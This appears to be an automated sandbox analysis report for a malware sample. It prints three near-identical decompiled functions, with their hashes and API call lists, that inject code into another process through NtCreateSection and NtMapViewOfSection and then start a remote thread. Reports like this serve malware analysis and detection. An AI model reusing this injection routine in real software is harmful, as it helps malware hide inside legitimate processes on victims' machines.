                    • Instruction ID: 8f06ba0e6be14d774fc29792ef997f0c6ad8488ad82e83f8fd62a1598589dc5c
                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction Fuzzy Hash: D5118C3204014EBBCF165F85DD01CEE3F62BB18354B588416FE2898131D37AC9B2AB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4%
                    Dynamic/Decrypted Code Coverage:41.3%
                    Signature Coverage:0%
                    Total number of Nodes:189
                    Total number of Limit Nodes:7

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 85 40143b-401444 86 40145b 85->86 87 40144c-401457 85->87 86->87 88 40145e-401482 call 401134 86->88 87->88 94 401484 88->94 95 401487-40148c 88->95 94->95 97 4017b2-4017ba 95->97 98 401492-4014a3 95->98 97->95 101 4017b0-4017d3 98->101 102 4014a9-4014d2 98->102 110 4017e5 101->110 102->101 109 4014d8-4014ef NtDuplicateObject 102->109 109->101 111 4014f5-401519 NtCreateSection 109->111 113 401575-40159b NtCreateSection 111->113 114 40151b-40153c NtMapViewOfSection 111->114 113->101 118 4015a1-4015a5 113->118 114->113 116 40153e-40155a NtMapViewOfSection 114->116 116->113 119 40155c-401572 116->119 118->101 120 4015ab-4015cc NtMapViewOfSection 118->120 119->113 120->101 121 4015d2-4015ee NtMapViewOfSection 120->121 121->101 123 4015f4 call 4015f9 121->123
                    C-Code - Quality: 54%
                    			E0040143B(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				long _v12;
                    				void* _v16;
                    				void* _v20;
                    				char _v44;
                    				char _v52;
                    				long _v56;
                    				long _v60;
                    				char _v64;
                    				char _v68;
                    				char _v72;
                    				char _v76;
                    				char _v84;
                    				char _v88;
                    				char _v92;
                    				intOrPtr _v96;
                    				char _v100;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr _t84;
                    				intOrPtr _t87;
                    				long _t90;
                    				void* _t91;
                    				struct _GUID _t98;
                    				struct _GUID _t100;
                    				PVOID* _t102;
                    				PVOID* _t104;
                    				intOrPtr* _t108;
                    				PVOID* _t120;
                    				PVOID* _t122;
                    				intOrPtr _t126;
                    				long* _t129;
                    				signed int _t136;
                    				int _t137;
                    				intOrPtr _t154;
                    				void* _t159;
                    				intOrPtr* _t160;
                    				void* _t163;
                    				void* _t170;
                    				long _t171;
                    				intOrPtr _t172;
                    				void* _t173;
                    				long* _t178;
                    				intOrPtr* _t179;
                    				HANDLE* _t180;
                    				HANDLE* _t181;
                    				void* _t186;
                    				void* _t187;
                    				intOrPtr* _t190;
                    				void* _t191;
                    				intOrPtr _t194;
                    				intOrPtr* _t195;
                    				void* _t196;
                    				void* _t197;
                    				intOrPtr* _t198;
                    				long _t216;
                    				void* _t222;
                    
                    				_push(0x1474);
                    				_t84 =  *_t195;
                    				_t196 = _t195 + 4;
                    				E00401134(_t84, _t170, __eflags, _t222);
                    				_t126 = _a4;
                    				_t171 = 0;
                    				_v56 = 0;
                    				if(gs != 0) {
                    					_v56 = _v56 + 1;
                    				}
                    				while(1) {
                    					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
                    					if(_t87 != 0) {
                    						break;
                    					}
                    					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                    				}
                    				_v96 = _t87;
                    				_t178 =  &_v100;
                    				 *_t178 = _t171;
                    				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t178);
                    				_t90 =  *_t178;
                    				if(_t90 != 0) {
                    					_t129 =  &_v52;
                    					 *_t129 = _t90;
                    					_t129[1] = _t171;
                    					_t179 =  &_v44;
                    					 *((intOrPtr*)(_t126 + 0x10))(_t179, 0x18);
                    					 *_t179 = 0x18;
                    					_push( &_v52);
                    					_push(_t179);
                    					_push(0x40);
                    					_push( &_v20);
                    					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t171, _t171, 2) == 0) {
                    						_v12 = _t171;
                    						_t98 =  &_v84;
                    						 *(_t98 + 4) = _t171;
                    						 *_t98 = 0x5000;
                    						_t180 =  &_v88;
                    						if(NtCreateSection(_t180, 6, _t171, _t98, 4, 0x8000000, _t171) == 0) {
                    							_push(_v84);
                    							_pop( *_t25);
                    							_t120 =  &_v72;
                    							 *_t120 = _t171;
                    							if(NtMapViewOfSection( *_t180, 0xffffffff, _t120, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
                    								_t122 =  &_v64;
                    								 *_t122 = _t171;
                    								if(NtMapViewOfSection( *_t180, _v16, _t122, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
                    									_t194 = _v72;
                    									 *((intOrPtr*)(_t126 + 0x20))(_t171, _t194, 0x104);
                    									 *((intOrPtr*)(_t194 + 0x208)) = _a16;
                    									_v12 = _v12 + 1;
                    								}
                    							}
                    						}
                    						_t100 =  &_v84;
                    						 *(_t100 + 4) = _t171;
                    						 *_t100 = _a12 + 0x10000;
                    						_t181 =  &_v92;
                    						if(NtCreateSection(_t181, 0xe, _t171, _t100, 0x40, 0x8000000, _t171) == 0 && _v12 != 0) {
                    							_push(_v84);
                    							_pop( *_t46);
                    							_t102 =  &_v76;
                    							 *_t102 = _t171;
                    							if(NtMapViewOfSection( *_t181, 0xffffffff, _t102, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
                    								_t104 =  &_v68;
                    								 *_t104 = _t171;
                    								_t216 = NtMapViewOfSection( *_t181, _v16, _t104, _t171, _t171, _t171,  &_v60, 1, _t171, 0x20);
                    								if(_t216 == 0) {
                    									L21();
                    									if(_t216 == 0 && _t216 != 0) {
                    										asm("xlatb");
                    										asm("rcl dword [ebx], 0x8b");
                    									}
                    									_t197 = _t196 + 4;
                    									_push(0x2eb0);
                    									_t198 = _t197 + 4;
                    									_push(0x2260);
                    									_t154 =  *_t198;
                    									_push(_t154);
                    									asm("lodsb");
                    									asm("loop 0xffffffc9");
                    									_t186 = _a8 +  *_a8;
                    									_t136 =  *(_t186 + 6) & 0x0000ffff;
                    									_push(_t186);
                    									_t159 = _t186;
                    									if(_v56 == 0) {
                    										_t160 = _t159 + 0xf8;
                    										__eflags = _t160;
                    									} else {
                    										_t160 = _t159 + 0x108;
                    									}
                    									_push(_t136);
                    									_t137 =  *(_t160 + 0x10);
                    									if(_t137 != 0) {
                    										memcpy( *((intOrPtr*)(_t160 + 0xc)) + _v76,  *((intOrPtr*)(_t160 + 0x14)) + _a8, _t137);
                    									}
                    									asm("loop 0xffffffe6");
                    									_pop(_t187);
                    									if(_v56 == 0) {
                    										_push(_t187);
                    										_t163 =  *((intOrPtr*)(_t187 + 0x34)) - _v68;
                    										_t190 =  *((intOrPtr*)(_t187 + 0xa0)) + _v76;
                    										__eflags = _t190;
                    										while(1) {
                    											__eflags =  *_t190;
                    											if( *_t190 == 0) {
                    												break;
                    											}
                    											_t172 =  *_t190;
                    											_t190 = _t190 + 8;
                    											asm("lodsw");
                    											__eflags = 0;
                    											if(0 != 0) {
                    												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t163;
                    												__eflags =  *((intOrPtr*)(0 + _v76 + _t172));
                    											}
                    											asm("loop 0xffffffe9");
                    										}
                    										_pop(_t191);
                    										_t171 = 0;
                    										__eflags = 0;
                    										_t108 =  &_v8;
                    										 *_t108 = 0;
                    										 *((intOrPtr*)(_t126 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t191 + 0x28)) + _v68, _v64, _t108, 0);
                    									} else {
                    										L54();
                    										_pop(_t173);
                    										_t171 = _t173 - 0x16ee;
                    										 *((intOrPtr*)(_t171 + 0x1722)) = _t171 + 0x2bbb;
                    										L004011C3();
                    										0x33(_t171 + 0x2bbb, 0x1ad);
                    										 *((intOrPtr*)(_t171 + 0x1747)) = _t171 + 0x2c0b;
                    										0x33();
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t91 = 0x1474;
                    				_push(0x379);
                    			}

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: a1a548987cee5af6a20eaada0c048d68b1c52e2eb5f25007b876aabe9c92dcad
                    • Instruction ID: a241dfb1a7147892ad06c72b7904183168c99d91159797a80032ec6269488466
                    • Opcode Fuzzy Hash: a1a548987cee5af6a20eaada0c048d68b1c52e2eb5f25007b876aabe9c92dcad
                    • Instruction Fuzzy Hash: E2513F74900209BFEB208F91CC89FAF7BB8EF85B50F10412AF911BA1E5D7749941CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 125 401446-401482 call 401134 133 401484 125->133 134 401487-40148c 125->134 133->134 136 4017b2-4017ba 134->136 137 401492-4014a3 134->137 136->134 140 4017b0-4017d3 137->140 141 4014a9-4014d2 137->141 149 4017e5 140->149 141->140 148 4014d8-4014ef NtDuplicateObject 141->148 148->140 150 4014f5-401519 NtCreateSection 148->150 152 401575-40159b NtCreateSection 150->152 153 40151b-40153c NtMapViewOfSection 150->153 152->140 157 4015a1-4015a5 152->157 153->152 155 40153e-40155a NtMapViewOfSection 153->155 155->152 158 40155c-401572 155->158 157->140 159 4015ab-4015cc NtMapViewOfSection 157->159 158->152 159->140 160 4015d2-4015ee NtMapViewOfSection 159->160 160->140 162 4015f4 call 4015f9 160->162
                    C-Code - Quality: 56%
                    			E00401446(void* __eax, void* __edi) {
                    				intOrPtr _t85;
                    				intOrPtr _t88;
                    				long _t91;
                    				void* _t92;
                    				struct _GUID _t99;
                    				struct _GUID _t101;
                    				PVOID* _t103;
                    				PVOID* _t105;
                    				intOrPtr* _t109;
                    				PVOID* _t121;
                    				PVOID* _t123;
                    				intOrPtr _t127;
                    				long* _t131;
                    				signed int _t138;
                    				int _t139;
                    				intOrPtr _t156;
                    				void* _t161;
                    				intOrPtr* _t162;
                    				void* _t165;
                    				long _t173;
                    				intOrPtr _t175;
                    				void* _t176;
                    				long* _t181;
                    				intOrPtr* _t183;
                    				HANDLE* _t184;
                    				HANDLE* _t185;
                    				void* _t190;
                    				void* _t191;
                    				intOrPtr* _t194;
                    				void* _t195;
                    				void* _t198;
                    				void* _t199;
                    				intOrPtr* _t201;
                    				void* _t202;
                    				void* _t204;
                    				intOrPtr* _t205;
                    				void* _t209;
                    				long _t223;
                    				void* _t229;
                    
                    				asm("sbb bh, [edx]");
                    				_t209 = __eax - 0x78;
                    				asm("int 0xaa");
                    				_push(0x1474);
                    				_t85 =  *_t201;
                    				_t202 = _t201 + 4;
                    				E00401134(_t85, __edi, _t209, _t229);
                    				_t127 =  *((intOrPtr*)(_t199 + 8));
                    				_t173 = 0;
                    				 *((intOrPtr*)(_t199 - 0x34)) = 0;
                    				if(gs != 0) {
                    					 *((intOrPtr*)(_t199 - 0x34)) =  *((intOrPtr*)(_t199 - 0x34)) + 1;
                    				}
                    				while(1) {
                    					_t88 =  *((intOrPtr*)(_t127 + 0x48))();
                    					if(_t88 != 0) {
                    						break;
                    					}
                    					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                    				}
                    				 *((intOrPtr*)(_t199 - 0x5c)) = _t88;
                    				_t181 = _t199 - 0x60;
                    				 *_t181 = _t173;
                    				 *((intOrPtr*)(_t127 + 0x4c))(_t88, _t181);
                    				_t91 =  *_t181;
                    				if(_t91 != 0) {
                    					_t131 = _t199 - 0x30;
                    					 *_t131 = _t91;
                    					_t131[1] = _t173;
                    					_t183 = _t199 - 0x28;
                    					 *((intOrPtr*)(_t127 + 0x10))(_t183, 0x18);
                    					 *_t183 = 0x18;
                    					_push(_t199 - 0x30);
                    					_push(_t183);
                    					_push(0x40);
                    					_push(_t199 - 0x10);
                    					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t199 - 0x10), 0xffffffff, 0xffffffff, _t199 - 0xc, _t173, _t173, 2) == 0) {
                    						 *(_t199 - 8) = _t173;
                    						_t99 = _t199 - 0x50;
                    						 *(_t99 + 4) = _t173;
                    						 *_t99 = 0x5000;
                    						_t184 = _t199 - 0x54;
                    						if(NtCreateSection(_t184, 6, _t173, _t99, 4, 0x8000000, _t173) == 0) {
                    							 *_t25 =  *(_t199 - 0x50);
                    							_t121 = _t199 - 0x44;
                    							 *_t121 = _t173;
                    							if(NtMapViewOfSection( *_t184, 0xffffffff, _t121, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
                    								_t123 = _t199 - 0x3c;
                    								 *_t123 = _t173;
                    								if(NtMapViewOfSection( *_t184,  *(_t199 - 0xc), _t123, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
                    									_t198 =  *(_t199 - 0x44);
                    									 *((intOrPtr*)(_t127 + 0x20))(_t173, _t198, 0x104);
                    									 *((intOrPtr*)(_t198 + 0x208)) =  *((intOrPtr*)(_t199 + 0x14));
                    									 *(_t199 - 8) =  *(_t199 - 8) + 1;
                    								}
                    							}
                    						}
                    						_t101 = _t199 - 0x50;
                    						 *(_t101 + 4) = _t173;
                    						 *_t101 =  *((intOrPtr*)(_t199 + 0x10)) + 0x10000;
                    						_t185 = _t199 - 0x58;
                    						if(NtCreateSection(_t185, 0xe, _t173, _t101, 0x40, 0x8000000, _t173) == 0 &&  *(_t199 - 8) != 0) {
                    							 *_t46 =  *(_t199 - 0x50);
                    							_t103 = _t199 - 0x48;
                    							 *_t103 = _t173;
                    							if(NtMapViewOfSection( *_t185, 0xffffffff, _t103, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
                    								_t105 = _t199 - 0x40;
                    								 *_t105 = _t173;
                    								_t223 = NtMapViewOfSection( *_t185,  *(_t199 - 0xc), _t105, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 0x20);
                    								if(_t223 == 0) {
                    									L20();
                    									if(_t223 == 0 && _t223 != 0) {
                    										asm("xlatb");
                    										asm("rcl dword [ebx], 0x8b");
                    									}
                    									_t204 = _t202 + 4;
                    									_push(0x2eb0);
                    									_t205 = _t204 + 4;
                    									_push(0x2260);
                    									_t156 =  *_t205;
                    									_push(_t156);
                    									asm("lodsb");
                    									asm("loop 0xffffffc9");
                    									_t190 =  *((intOrPtr*)(_t199 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0xc))));
                    									_t138 =  *(_t190 + 6) & 0x0000ffff;
                    									_push(_t190);
                    									_t161 = _t190;
                    									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
                    										_t162 = _t161 + 0xf8;
                    										__eflags = _t162;
                    									} else {
                    										_t162 = _t161 + 0x108;
                    									}
                    									_push(_t138);
                    									_t139 =  *(_t162 + 0x10);
                    									if(_t139 != 0) {
                    										memcpy( *((intOrPtr*)(_t162 + 0xc)) +  *(_t199 - 0x48),  *((intOrPtr*)(_t162 + 0x14)) +  *((intOrPtr*)(_t199 + 0xc)), _t139);
                    									}
                    									asm("loop 0xffffffe6");
                    									_pop(_t191);
                    									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
                    										_push(_t191);
                    										_t165 =  *((intOrPtr*)(_t191 + 0x34)) -  *(_t199 - 0x40);
                    										_t194 =  *((intOrPtr*)(_t191 + 0xa0)) +  *(_t199 - 0x48);
                    										__eflags = _t194;
                    										while(1) {
                    											__eflags =  *_t194;
                    											if( *_t194 == 0) {
                    												break;
                    											}
                    											_t175 =  *_t194;
                    											_t194 = _t194 + 8;
                    											asm("lodsw");
                    											__eflags = 0;
                    											if(0 != 0) {
                    												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t165;
                    												__eflags =  *((intOrPtr*)(0 +  *(_t199 - 0x48) + _t175));
                    											}
                    											asm("loop 0xffffffe9");
                    										}
                    										_pop(_t195);
                    										_t173 = 0;
                    										__eflags = 0;
                    										_t109 = _t199 - 4;
                    										 *_t109 = 0;
                    										 *((intOrPtr*)(_t127 + 0x98))( *(_t199 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t195 + 0x28)) +  *(_t199 - 0x40),  *(_t199 - 0x3c), _t109, 0);
                    									} else {
                    										L53();
                    										_pop(_t176);
                    										_t173 = _t176 - 0x16ee;
                    										 *((intOrPtr*)(_t173 + 0x1722)) = _t173 + 0x2bbb;
                    										L004011C3();
                    										0x33(_t173 + 0x2bbb, 0x1ad);
                    										 *((intOrPtr*)(_t173 + 0x1747)) = _t173 + 0x2c0b;
                    										0x33();
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t92 = 0x1474;
                    				_push(0x379);
                    			}

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: aa239b2ee7b7a1a0b3ffb45dfca917dbddb9bacbaae0f77fc96c0f4f43538294
                    • Instruction ID: 875affe5b8015aa942028eb222aca49a3761eb159d59d404aa124f65acbec2ce
                    • Opcode Fuzzy Hash: aa239b2ee7b7a1a0b3ffb45dfca917dbddb9bacbaae0f77fc96c0f4f43538294
                    • Instruction Fuzzy Hash: 83511B74900249BFEB208F91CC89FEFBBB8EF85B10F104159F951AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 164 40145d-401482 call 401134 171 401484 164->171 172 401487-40148c 164->172 171->172 174 4017b2-4017ba 172->174 175 401492-4014a3 172->175 174->172 178 4017b0-4017d3 175->178 179 4014a9-4014d2 175->179 187 4017e5 178->187 179->178 186 4014d8-4014ef NtDuplicateObject 179->186 186->178 188 4014f5-401519 NtCreateSection 186->188 190 401575-40159b NtCreateSection 188->190 191 40151b-40153c NtMapViewOfSection 188->191 190->178 195 4015a1-4015a5 190->195 191->190 193 40153e-40155a NtMapViewOfSection 191->193 193->190 196 40155c-401572 193->196 195->178 197 4015ab-4015cc NtMapViewOfSection 195->197 196->190 197->178 198 4015d2-4015ee NtMapViewOfSection 197->198 198->178 200 4015f4 call 4015f9 198->200
                    C-Code - Quality: 57%
                    			E0040145D(void* __edi, void* __eflags) {
                    				void* _t84;
                    				intOrPtr _t87;
                    				long _t90;
                    				void* _t91;
                    				struct _GUID _t98;
                    				struct _GUID _t100;
                    				PVOID* _t102;
                    				PVOID* _t104;
                    				intOrPtr* _t108;
                    				PVOID* _t120;
                    				PVOID* _t122;
                    				intOrPtr _t126;
                    				long* _t130;
                    				signed int _t137;
                    				int _t138;
                    				intOrPtr _t155;
                    				void* _t160;
                    				intOrPtr* _t161;
                    				void* _t164;
                    				long _t172;
                    				intOrPtr _t174;
                    				void* _t175;
                    				long* _t180;
                    				intOrPtr* _t182;
                    				HANDLE* _t183;
                    				HANDLE* _t184;
                    				void* _t189;
                    				void* _t190;
                    				intOrPtr* _t193;
                    				void* _t194;
                    				void* _t197;
                    				void* _t198;
                    				void* _t200;
                    				void* _t202;
                    				intOrPtr* _t203;
                    				long _t221;
                    				void* _t227;
                    
                    				asm("outsd");
                    				E00401134(_t84, __edi, __eflags, _t227);
                    				_t126 =  *((intOrPtr*)(_t198 + 8));
                    				_t172 = 0;
                    				 *((intOrPtr*)(_t198 - 0x34)) = 0;
                    				if(gs != 0) {
                    					 *((intOrPtr*)(_t198 - 0x34)) =  *((intOrPtr*)(_t198 - 0x34)) + 1;
                    				}
                    				while(1) {
                    					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
                    					if(_t87 != 0) {
                    						break;
                    					}
                    					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                    				}
                    				 *((intOrPtr*)(_t198 - 0x5c)) = _t87;
                    				_t180 = _t198 - 0x60;
                    				 *_t180 = _t172;
                    				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t180);
                    				_t90 =  *_t180;
                    				if(_t90 != 0) {
                    					_t130 = _t198 - 0x30;
                    					 *_t130 = _t90;
                    					_t130[1] = _t172;
                    					_t182 = _t198 - 0x28;
                    					 *((intOrPtr*)(_t126 + 0x10))(_t182, 0x18);
                    					 *_t182 = 0x18;
                    					_push(_t198 - 0x30);
                    					_push(_t182);
                    					_push(0x40);
                    					_push(_t198 - 0x10);
                    					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t198 - 0x10), 0xffffffff, 0xffffffff, _t198 - 0xc, _t172, _t172, 2) == 0) {
                    						 *(_t198 - 8) = _t172;
                    						_t98 = _t198 - 0x50;
                    						 *(_t98 + 4) = _t172;
                    						 *_t98 = 0x5000;
                    						_t183 = _t198 - 0x54;
                    						if(NtCreateSection(_t183, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
                    							 *_t25 =  *(_t198 - 0x50);
                    							_t120 = _t198 - 0x44;
                    							 *_t120 = _t172;
                    							if(NtMapViewOfSection( *_t183, 0xffffffff, _t120, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    								_t122 = _t198 - 0x3c;
                    								 *_t122 = _t172;
                    								if(NtMapViewOfSection( *_t183,  *(_t198 - 0xc), _t122, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    									_t197 =  *(_t198 - 0x44);
                    									 *((intOrPtr*)(_t126 + 0x20))(_t172, _t197, 0x104);
                    									 *((intOrPtr*)(_t197 + 0x208)) =  *((intOrPtr*)(_t198 + 0x14));
                    									 *(_t198 - 8) =  *(_t198 - 8) + 1;
                    								}
                    							}
                    						}
                    						_t100 = _t198 - 0x50;
                    						 *(_t100 + 4) = _t172;
                    						 *_t100 =  *((intOrPtr*)(_t198 + 0x10)) + 0x10000;
                    						_t184 = _t198 - 0x58;
                    						if(NtCreateSection(_t184, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 &&  *(_t198 - 8) != 0) {
                    							 *_t46 =  *(_t198 - 0x50);
                    							_t102 = _t198 - 0x48;
                    							 *_t102 = _t172;
                    							if(NtMapViewOfSection( *_t184, 0xffffffff, _t102, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    								_t104 = _t198 - 0x40;
                    								 *_t104 = _t172;
                    								_t221 = NtMapViewOfSection( *_t184,  *(_t198 - 0xc), _t104, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 0x20);
                    								if(_t221 == 0) {
                    									L19();
                    									if(_t221 == 0 && _t221 != 0) {
                    										asm("xlatb");
                    										asm("rcl dword [ebx], 0x8b");
                    									}
                    									_t202 = _t200 + 4;
                    									_push(0x2eb0);
                    									_t203 = _t202 + 4;
                    									_push(0x2260);
                    									_t155 =  *_t203;
                    									_push(_t155);
                    									asm("lodsb");
                    									asm("loop 0xffffffc9");
                    									_t189 =  *((intOrPtr*)(_t198 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xc))));
                    									_t137 =  *(_t189 + 6) & 0x0000ffff;
                    									_push(_t189);
                    									_t160 = _t189;
                    									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
                    										_t161 = _t160 + 0xf8;
                    										__eflags = _t161;
                    									} else {
                    										_t161 = _t160 + 0x108;
                    									}
                    									_push(_t137);
                    									_t138 =  *(_t161 + 0x10);
                    									if(_t138 != 0) {
                    										memcpy( *((intOrPtr*)(_t161 + 0xc)) +  *(_t198 - 0x48),  *((intOrPtr*)(_t161 + 0x14)) +  *((intOrPtr*)(_t198 + 0xc)), _t138);
                    									}
                    									asm("loop 0xffffffe6");
                    									_pop(_t190);
                    									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
                    										_push(_t190);
                    										_t164 =  *((intOrPtr*)(_t190 + 0x34)) -  *(_t198 - 0x40);
                    										_t193 =  *((intOrPtr*)(_t190 + 0xa0)) +  *(_t198 - 0x48);
                    										__eflags = _t193;
                    										while(1) {
                    											__eflags =  *_t193;
                    											if( *_t193 == 0) {
                    												break;
                    											}
                    											_t174 =  *_t193;
                    											_t193 = _t193 + 8;
                    											asm("lodsw");
                    											__eflags = 0;
                    											if(0 != 0) {
                    												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
                    												__eflags =  *((intOrPtr*)(0 +  *(_t198 - 0x48) + _t174));
                    											}
                    											asm("loop 0xffffffe9");
                    										}
                    										_pop(_t194);
                    										_t172 = 0;
                    										__eflags = 0;
                    										_t108 = _t198 - 4;
                    										 *_t108 = 0;
                    										 *((intOrPtr*)(_t126 + 0x98))( *(_t198 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t194 + 0x28)) +  *(_t198 - 0x40),  *(_t198 - 0x3c), _t108, 0);
                    									} else {
                    										L52();
                    										_pop(_t175);
                    										_t172 = _t175 - 0x16ee;
                    										 *((intOrPtr*)(_t172 + 0x1722)) = _t172 + 0x2bbb;
                    										L004011C3();
                    										0x33(_t172 + 0x2bbb, 0x1ad);
                    										 *((intOrPtr*)(_t172 + 0x1747)) = _t172 + 0x2c0b;
                    										0x33();
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t91 = 0x1474;
                    				_push(0x379);
                    			}

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: c777d85a313d6204129e744fdb44d59ecbedb6b98fa3d971b816145188cb92c2
                    • Instruction ID: 64f050098b634efaf460332bf9a79526af7b9d542430e692bb7884b77a16f5e9
                    • Opcode Fuzzy Hash: c777d85a313d6204129e744fdb44d59ecbedb6b98fa3d971b816145188cb92c2
                    • Instruction Fuzzy Hash: C551FA75900249BFEB208F91CC89FAF7BB8FF85B10F104159FA11AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
